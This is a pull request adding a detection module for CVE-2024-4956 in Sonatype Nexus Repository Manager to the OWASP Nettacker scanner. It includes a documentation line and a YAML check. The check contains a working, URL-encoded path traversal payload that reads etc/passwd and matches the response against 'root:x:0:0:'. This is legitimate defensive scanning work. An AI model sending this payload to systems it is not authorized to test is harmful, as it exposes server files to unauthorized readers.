### PR TITLE
Detects Sonatype Nexus Repository Manager CVE-2024-4956

### DIFF
--- a/docs/Modules.md
+++ b/docs/Modules.md
@@ -221,6 +221,7 @@ If you want to scan all ports please define -g 1-65535 range. Otherwise Nettacke
 - '**meteobridge_cve_2025_4008_vuln**' - check for MeteoBridge unauthenticated command injection CVE-2025-4008
 - '**msexchange_cve_2021_26855_vuln**' – check the target for MS Exchange SSRF CVE-2021-26855
 - '**msexchange_cve_2021_34473_vuln**' – check the target for MS Exchange CVE-2021-34473 vulnerability
+- '**nexus_cve_2024_4956_vuln**' – Detects Sonatype Nexus Repository Manager CVE-2024-4956, an unauthenticated path traversal vulnerability that allows arbitrary file read.
 - '**novnc_cve_2021_3654_vuln**' – check the target for noVNC CVE-2021-3654 vulnerability
 - '**omigod_cve_2021_38647_vuln**' – check the target for OMIGOD CVE-2021-38647 vulnerability
 - '**paloalto_globalprotect_cve_2025_0133_vuln**' – check the target for PaloAlto GlobalProtect CVE-2025-0133 XSS vulnerability

--- a/nettacker/modules/vuln/nexus_cve_2024_4956.yaml
+++ b/nettacker/modules/vuln/nexus_cve_2024_4956.yaml
@@ -1,0 +1,64 @@
+info:
+  name: nexus_cve_2024_4956_vuln
+  author: Prajwal G N (@Prajwal5755)
+  severity: 7.5
+  description: Detects Sonatype Nexus Repository Manager CVE-2024-4956 unauthenticated path traversal allowing arbitrary file read.
+
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-4956
+    - https://support.sonatype.com/hc/en-us/articles/29416509323923-CVE-2024-4956-Nexus-Repository-3-Path-Traversal-2024-05-16
+
+  profiles:
+    - vuln
+    - http
+    - nexus
+    - cve
+    - cve2024
+    - high_severity
+    - cisa_kev
+
+payloads:
+  - library: http
+    steps:
+
+      - method: get
+        timeout: 5
+
+        headers:
+          User-Agent: "{user_agent}"
+
+        ssl: false
+
+        url:
+          nettacker_fuzzer:
+            input_format: "{{schema}}://{target}:{{ports}}{{path}}"
+
+            prefix: ""
+            interceptors: []
+            suffix: ""
+
+            data:
+              schema:
+                - "http"
+
+              ports:
+                - 80
+                - 443
+                - 8081
+
+              path:
+                - "/%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd"
+
+
+
+
+        response:
+          condition_type: and
+          conditions:
+            status_code:
+              regex: "200"
+              reverse: false
+
+            content:
+              regex: "root:x:0:0:"
+              reverse: false


### PR DESCRIPTION
<!--
  Thanks for contributing to OWASP Nettacker! 
  Please read and follow the instructions!
  Please DO NOT REMOVE THIS PR TEMPLATE AND THE PR CHECKLIST AT THE BOTTOM!
-->

## Proposed change

<!--
  Describe the big picture of your changes.
  Don't forget to link your PR to a new or existing issue.
  Remember to digitally sign your commits, run tests, attach screenshot/video evidence, add documentation
  Check and follow the contribution guidelines here: https://nettacker.readthedocs.io/en/latest/Developers/#contribution-guidelines
  We use CodeRabbit.AI to perform the first round of PR reviews
  PRs failing to comply with the contribution guidelines and PR checks in this template may be auto-closed without a human maintainer review
-->

Your PR description goes here:
Closes #1622

This PR adds a new vulnerability detection module for **CVE-2024-4956**, a path traversal vulnerability affecting **Sonatype Nexus Repository Manager** (all 3.x OSS/Pro versions up to and including **3.68.0**). The module detects vulnerable instances by sending a crafted HTTP request and validating the response for arbitrary file disclosure. The module was tested locally against the **Vulhub Nexus Repository OSS 3.68.0-04** environment and successfully detected the vulnerability. The corresponding module documentation has also been updated.



## Type of change

<!--
  Type of change you want to introduce. 
  Select one (1) option only.
  If your PR seems to fit multiple options, it likely should be split into multiple PRs.
-->

- [ ] New core framework functionality
- [ ] Bugfix (non-breaking change that fixes an issue)
- [ ] Code refactoring without any functionality changes
- [x] New or existing module/payload change
- [ ] Documentation/localization improvement
- [ ] Test coverage improvement
- [ ] Dependency upgrade
- [ ] Other improvement (best practice, cleanup, optimization, etc)

## Checklist

<!--
  Put an `x` in the boxes that apply. You can change them after the PR is created.
-->

- [x] I've followed the [contributing guidelines][contributing-guidelines]
- [x] I've **digitally signed** all my commits in this PR
- [ ] I've run `make pre-commit` and confirm it didn't generate any warnings/changes
- [ ] I've run `make test` and I confirm all tests passed locally
- [x] I've added/updated any relevant documentation in the `docs/` folder 
- [x] I've linked this PR with an open issue
- [x] I've tested and verified that my code works as intended and resolves the issue as described
- [x] I've attached screenshots demonstrating that my code works as intended (if applicable)
- [x] I've checked all other open PRs to avoid submitting duplicate work
- [x] I confirm that the code and comments in this PR are not direct unreviewed outputs of AI
- [x] I confirm that I am the Sole Responsible Author for every line of code, comment, and design decision

<!--
  Thanks again for your contribution!
-->

[contributing-guidelines]: https://nettacker.readthedocs.io/en/latest/Developers/#contribution-guidelines

<img width="1466" height="969" alt="Screenshot from 2026-07-16 16-04-49" src="https://github.com/user-attachments/assets/193b97f8-6fcc-494c-a582-62c578424113" />

